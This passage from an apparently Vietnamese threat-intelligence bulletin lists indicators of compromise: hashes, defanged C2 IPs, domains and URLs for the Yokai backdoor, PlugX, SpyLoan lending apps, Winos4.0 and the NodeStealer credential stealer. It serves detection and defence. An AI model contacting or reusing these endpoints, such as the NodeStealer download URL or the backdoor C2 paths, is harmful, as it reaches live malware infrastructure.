Indicator of Compromise (IoC)

Indicators Indicator Type Mô tả
0e501e4581610c7618466e071c28691eb8680ab1 SHA1 CleverSoar Installer
156.224.26[.]7 IP Winos4.0 C2
8848.twilight[.]zip Domain Backdoor C2

4.1.3       Chiến dịch Yokai Backdoor nhắm mục tiêu vào tổ chức tại Thái Lan, sử dụng DLL side-loading

Indicator of Compromise (IoC)

Hash SHA256

RAR file

248c50331f375e7e73f010e4158ec2db8835a4373da2687ab75e8a73fde795f0

LNK files

c74f67bb13a79ae8c111095f18b57a10e63d9f8bfbffec8859c61360083ce43e

24509eb64a11f7e21feeb667b1d70520b1b1db8345d0e6502b657d416ef81a4d

Benign decoy documents

c7746e0031fba26ca6a8ecc3cee9e3dd50507fe2c1136356f852e068e1f943d0 (PDF)

90f4364705f19929d5cc0dafc44946768e39e81338715503dbc923b75c6edfd5 (DOCX)

Dropper

f361f5ec213b861dc4a76eb2835d70e6739321539ad216ea5dc416c1dc026528

Legitimate iTop Data Recovery application

452be2f9018f1ef2d74c935eac391ecdceff9a12cb950441f4f4e26b2b050fa1

Yokai Backdoor

eaae6d5dbf40239fb5abfa2918286f4039a3a0fcd28276a41281957f6d850456

3e5cfe768817da9a78b63efad9e60d2d300727a97476edf87be088fb26f06500

1626ce79f2b96c126cbdb00195dd8509353e8754b1a0ce88d359fa890acd6676

2852223eb40cf0dae4111be28ce37ce9af23e5332fb78b47c8f5568d497d2611

C2 addresses

122.155.28[.]155:80/page/index.php

154.90.47[.]77:80/

191.police.go[.]th:443/api/index.php

191.police.go[.]th:443/Assessment/Report/PDF/default.php

m-society.dpis.go[.]th:443/default.php

49.231.18[.]150:80/research/files/index.php

4.1.4       Phần mềm độc hại SpyLoan nhắm vào người dùng tại Nam Mỹ, Đông Nam Á và Châu Phi

Indicator of Compromise (IoC)

Package App Name Downloads Country SHA256
com.prestamoseguro.ss Préstamo Seguro-Rápido, seguro 1M Mexico f71dc766744573efb37f04851229eb47fc89aa7ae9124c77b94f1aa1ccc53b6c
com.voscp.rapido Préstamo Rápido-Credit Easy 1M Colombia 22f4650621fea7a4deab4742626139d2e6840a9956285691b2942b69fef0ab22
com.uang.belanja ได้บาทง่ายๆ-สินเชื่อด่วน 1M Senegal b5209ae7fe60abd6d86477d1f661bfba306d9b9cbd26cfef8c50b81bc8c27451
com.rupiahkilat.best RupiahKilat-Dana cair 1M Senegal 9d51a5c0f9abea8e9777e9d8615bcab2f9794b60bf233e3087615638ceaa140e
com.gotoloan.cash ยืมอย่างมีความสุข – เงินกู้ 1M Thailand 852a1ae6193899f495d047904f4bdb56cc48836db4d57056b02352ae0a63be12
com.hm.happy.money เงินมีความสุข – สินเชื่อด่วน 1M Thailand 43977fce320b39a02dc4e323243ea1b3bc532627b5bc8e15906aaff5e94815ee
com.kreditku.kuindo KreditKu-Uang Online 500K Indonesia dfbf0bf821fa586d4e58035ed8768d2b0f1226a3b544e5f9190746b6108de625
com.winner.rupiahcl Dana Kilat-Pinjaman kecil 500K Indonesia b67e970d9df925439a6687d5cd6c80b9e5bdaa5204de14a831021e679f6fbdf1
com.vay.cashloan.cash Cash Loan-Vay tiền 100K Vietnam e303fdfc7fd02572e387b8b992be2fed57194c7af5c977dfb53167a1b6e2f01b
com.restrict.bright.cowboy RapidFinance 100K Tanzania e59fd9d96b3a446a2755e1dfc5a82ef07a3965866a7a1cb2cc1a2ffb288d110c
com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret PrêtPourVous 100K Senegal 453e23e68a9467f861d03cbace1f3d19909340dac8fabf4f70bc377f0155834e
com.huaynamoney.prestamos.creditos.peru.loan.credit Huayna Money – Préstamo Rápido 100K Peru ef91f497e841861f1b52847370e2b77780f1ee78b9dab88c6d78359e13fb19dc
com.credito.iprestamos.dinero.en.linea.chile IPréstamos: Rápido Crédito 100K Chile 45697ddfa2b9f7ccfbd40e971636f9ef6eeb5d964e6802476e8b3561596aa6c2
com.conseguir.sol.pe ConseguirSol-Dinero Rápido 100K Peru 79fd1dccfa16c5f3a41fbdb0a08bb0180a2e9e5a2ae95ef588b3c39ee063ce48
com.pret.loan.ligne.personnel ÉcoPrêt Prêt En Ligne 50K Thailand 27743ab447cb3731d816afb7a4cecc73023efc4cd4a65b6faf3aadfd59f1768e

 

4.2      Danh sách IoCs liên quan đến mã độc

4.2.1       Các phát hiện mới liên quan đến mã độc PlugX

Indicator of Compromise (IoC)

Domains

howtotopics[.]com

thelocaltribe[.]com

councilofwizards[.]com

goclamdep[.]net

Administration Servers

115.61.168[.]143

115.61.169[.]139

182.114.110[.]170

Tệp tin độc hại

Hash SHA-1

b463f3c978f11a12e4cbdfd6ff141451ed32bb7c

3d60ae2d85c3370aefe2ce75d59bcbd6bd5143f8

a1effe50783e442e0ec62bd848eb21e50e32f69e

b6f020b568b604205a93025fe9b00a10db830629

fc8d5e3ffc56198118b1d5155c9116a242008809

a8a7c84adc604f64a3800fb7bba4262c103d7531

C2 Servers (October-December 2024)

103.79.120[.]92

45.83.236[.]105

116.206.178[.]67

45.133.239[.]183

116.206.178[.]68

103.238.225[.]248

45.133.239[.]21

103.238.227[.]183

103.107.104[.]37

107.148.32[.]206

167.179.100[.]144

116.206.178[.]34

149.104.2[.]160

207.246.106[.]38

45.76.132[.]25

155.138.203[.]78

144.76.60[.]136

38.180.75[.]197

107.155.56[.]15

107.155.56[.]87

202.91.36[.]213

107.155.56[.]4

149.104.12[.]64

154.205.136[.]105

223.26.52[.]208

45.128.153[.]73

96.43.101[.]245

45.135.119[.]132

161.97.107[.]93

103.107.105[.]81

103.107.104[.]4

103.107.104[.]57

154.90.47[.]123

147.78.12[.]202

4.2.2       Mã độc NodeStealer

Indicator of Compromise (IoC)

Tệp tin độc hại

Hash SHA1

c422b0dc002533fad9bed9a8eb6ae7c17a57405d

e9a578b98b70e0c2e2bc4ee1f33cae1270297846

Hash SHA256

786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458

URL:

hxxps://t[.]ly/MRAbJ

hxxp://88[.]216[.]99[.]5:15707/entry[.]txt